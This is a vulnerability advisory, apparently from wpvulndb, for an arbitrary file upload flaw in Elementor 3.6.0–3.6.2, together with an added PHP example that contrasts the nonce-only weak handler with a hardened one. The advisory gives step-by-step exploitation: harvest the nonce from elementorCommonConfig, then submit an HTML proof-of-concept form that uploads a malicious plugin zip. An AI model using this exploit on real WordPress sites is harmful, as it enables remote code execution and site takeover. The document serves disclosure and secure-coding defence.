WPEX-ID: DF62D170-C7D1-43A4-B6DC-20512934C33E (source: wpvulndb)
Date: Apr 13, 2022 - 12:00 a.m.

Elementor 3.6.0-3.6.2 - Subscriber+ Arbitrary File Upload


EPSS: 0.96 (High), percentile 99.5%

The plugin lacks a capability check in a function hooked to admin_init (introduced in v3.6.0) and relies only on a CSRF nonce check. Because that nonce is exposed to any authenticated user, such a user could call the function and, with a subsequent call, upload a malicious zip archive containing arbitrary files, leading to RCE.

To get the nonce, log in as any user (such as a subscriber) and check the page source for elementorCommonConfig. The file to upload should be a fake Elementor Pro plugin zip.

<body>
<form action="https://example.com/wp-admin/admin-ajax.php" enctype="multipart/form-data" method="POST">
<input type="text" name="_nonce" value="nonce retrieved from source (check elementorCommonConfig) of the dashboard when logged in as any user">
<input type="file" name="fileToUpload">
<input type="hidden" name="action" value="elementor_upload_and_install_pro">
<input type="submit" value="Submit">
</form>
</body>
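The root cause described above is a privileged action gated only by a nonce. The following added illustration (not Elementor's code; all function, action and nonce names are hypothetical) shows that weak pattern beside the hardened form a maintainer would ship: check the capability first, then the nonce, then validate the upload.

```php
<?php
// Added illustration, not the plugin's own code. Function names, the action
// value 'example_upload_and_install' and the nonce action 'example_upload_nonce'
// are hypothetical.

// WEAK PATTERN: only a nonce check. admin_init fires for every authenticated
// request to wp-admin (admin-ajax.php included), and if the nonce is printed
// into page config for all logged-in users, any subscriber satisfies this check.
function example_weak_upload_handler() {
    if ( empty( $_POST['action'] ) || 'example_upload_and_install' !== $_POST['action'] ) {
        return;
    }
    check_admin_referer( 'example_upload_nonce', '_nonce' ); // CSRF only
    example_install_from_upload( $_FILES['fileToUpload'] ); // no capability check
}

// HARDENED PATTERN: authorization, then CSRF, then input validation.
function example_hardened_upload_handler() {
    if ( empty( $_POST['action'] ) || 'example_upload_and_install' !== $_POST['action'] ) {
        return;
    }
    // Installing a plugin is a privileged operation; deny everyone who may not
    // install plugins before any file handling happens.
    if ( ! current_user_can( 'install_plugins' ) ) {
        wp_die( 'Insufficient permissions.', 403 );
    }
    // A nonce proves the request was intended by the user; it is not an
    // authorization control and must never replace the capability check.
    if ( ! wp_verify_nonce( $_POST['_nonce'] ?? '', 'example_upload_nonce' ) ) {
        wp_die( 'Invalid nonce.', 403 );
    }
    // Reject anything that is not a genuine upload of a zip archive.
    if ( empty( $_FILES['fileToUpload']['tmp_name'] )
        || ! is_uploaded_file( $_FILES['fileToUpload']['tmp_name'] ) ) {
        wp_die( 'No file uploaded.', 400 );
    }
    $check = wp_check_filetype_and_ext(
        $_FILES['fileToUpload']['tmp_name'],
        $_FILES['fileToUpload']['name']
    );
    if ( 'zip' !== $check['ext'] ) {
        wp_die( 'Only zip archives are accepted.', 400 );
    }
    example_install_from_upload( $_FILES['fileToUpload'] );
}

// Hypothetical installer stub; a real plugin would hand the archive to
// Plugin_Upgrader here.
function example_install_from_upload( array $file ) {
    // ... unpack and install ...
}

add_action( 'admin_init', 'example_hardened_upload_handler' );
```

The ordering matters: the capability check runs before the nonce check so that an unauthorized caller is refused regardless of whether they obtained a valid nonce, and the file-type check runs before the archive ever reaches the installer.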
